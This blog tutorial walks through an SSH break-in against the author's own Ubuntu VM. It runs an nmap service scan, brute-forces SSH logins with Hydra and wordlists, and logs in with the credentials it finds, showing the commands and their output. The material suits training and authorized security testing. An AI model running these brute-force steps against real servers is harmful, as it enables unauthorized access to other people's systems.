Sploitech

How To Gain Server SSH Access Using Nmap & Hydra

Nmap & Hydra

Tools & Software Required:

  • One System Capable Of Running Kali Linux. (You can also use virtual machines to perform the hack)
  • One host machine of your own to be hacked. (I am using raspberry pi 3 as the host machine)
  • Nmap Software. (By default it would be installed)
  • Hydra Software. (By default it would be installed)

Gathering Information About The Host/Server:

I am using my own Ubuntu VM as a server. Please don’t do this to hack anyone without their permission.

Steps To Get The Information About The Host:

  • First, we are going to ping the server to check if it is up or not
  • Type: ping {Ip Address Of The Host}
				
					ping {Ip Address Of The Host}
				
			

You should see this type of message if the host is up:

				
					┌──(kali㉿kali)-[~]
└─$ ping 192.168.1.12       
PING 192.168.1.12 (192.168.1.12) 56(84) bytes of data.
64 bytes from 192.168.1.12: icmp_seq=1 ttl=128 time=216 ms
64 bytes from 192.168.1.12: icmp_seq=2 ttl=128 time=8.44 ms
64 bytes from 192.168.1.12: icmp_seq=3 ttl=128 time=28.5 ms
^C
--- 192.168.1.12 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3006ms
rtt min/avg/max/mdev = 8.443/84.179/215.618/93.300 ms
				
			

Now that we know that the host is up we can proceed to scan for open ports on the server using Nmap.

Nmap is a free, open-source, and powerful tool used to discover hosts and services on a computer network. In our example, we are using Nmap to scan this machine to identify all services that are running on a particular port. Nmap has many capabilities, below is a table summarising some of the functionality it provides. To scan for open ports on the server we need to learn some commands that will help us to make our work easy.

-sVAttempts to determine the version of the services running
-p or -p-Port scan for port or scan all ports
-PnDisable host discovery and just scan for open ports
-AEnables OS and version detection executes in-build scripts for further enumeration 
-sCScan with the default Nmap scripts
-vVerbose mode
-sUUDP port scan
-sSTCP SYN port scan

There are many Nmap “cheatsheets” online that you can use too.

Now we are going to scan the server to get which services & ports are open on the server.

  • Type: nmap -sV {Ip Address Of The Host}
				
					nmap -sV {Ip Address Of The Host}
				
			

Now you have to wait for Nmap to complete the server scan. You can press enter to check the progress of the scan.

				
					┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.1.12       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-14 13:24 EDT
Nmap scan report for 192.168.1.12
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.50 seconds
				
			

Port 21 is an FTP port (File Transfer Protocol) which means anyone can transfer files from the server remotely.

Port 22 is an SSH port (Secure Shell) that lets anyone remotely control the server globally. We will be focusing on port 22.

Brute Force Using Hydra:

We are using hydra because it supports parallel processing to brute-force the correct username and password combination.

Now that we know port 22 is open we can use hydra to brute force the Username & Password.

				
					hydra -L username.txt -P password.txt ssh://{Ip Address Of The Host} -t 4
				
			
-l LOGIN or -L FILElogin with LOGIN name, or load several logins from FILE
-p PASS or -P FILEtry password PASS, or load several passwords from FILE
  • Instead of the user, you will have to enter your own file path where you have stored the username file which will be used to crack the username.
  • Instead of the passlist.txt, you will have to enter your own file path where you have stored the passwords file which will be used to crack the password.

If the attack is going to be successful it will show the username & password.

				
					┌──(kali㉿kali)-[~]
└─$ hydra -L /home/kali/name.txt -P /home/kali/password.txt ssh://192.168.1.12 -t 4   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-16 08:24:42
[DATA] max 4 tasks per 1 server, overall 4 tasks, 9 login tries (l:3/p:3), ~3 tries per task
[DATA] attacking ssh://192.168.1.12:22/
[22][ssh] host: 192.168.1.12   login: server   password: kali
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-16 08:24:46
				
			

Connecting to SSH:

Once you got the credentials of the server you can easily connect to SSH:

				
					┌──(kali㉿kali)-[~]
└─$ ssh server@192.168.1.12
server@192.168.1.12's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.11.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

290 updates can be installed immediately.
123 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Fri Aug 20 08:18:02 2021 from 192.168.1.8
server@ubuntu:~$ uname -a
Linux ubuntu 5.11.0-25-generic #27~20.04.1-Ubuntu SMP Tue Jul 13 17:41:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
server@ubuntu:~$ 

				
			

Conclusion

These types of attacks are not 100% successful. If you are using these types of attacks against a real server then a firewall could block your IP in no time. There are many other methods to do ssh brute force like Nmap or Metasploit. But this is the easiest one if you are a beginner.

Liked This Article? Join Our Newsletter.

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.

Share It On:

Share on facebook
Facebook
Share on whatsapp
WhatsApp
Share on reddit
Reddit
Share on telegram
Telegram
Share on email
Email

COMMENTS:

One Response

Leave a Reply

Your email address will not be published. Required fields are marked *

You Might Also Like:

Want To Know About Latest Hacking Tricks?

It’s Free! Get exclusive access to new tips, articles, guides, updates, and more.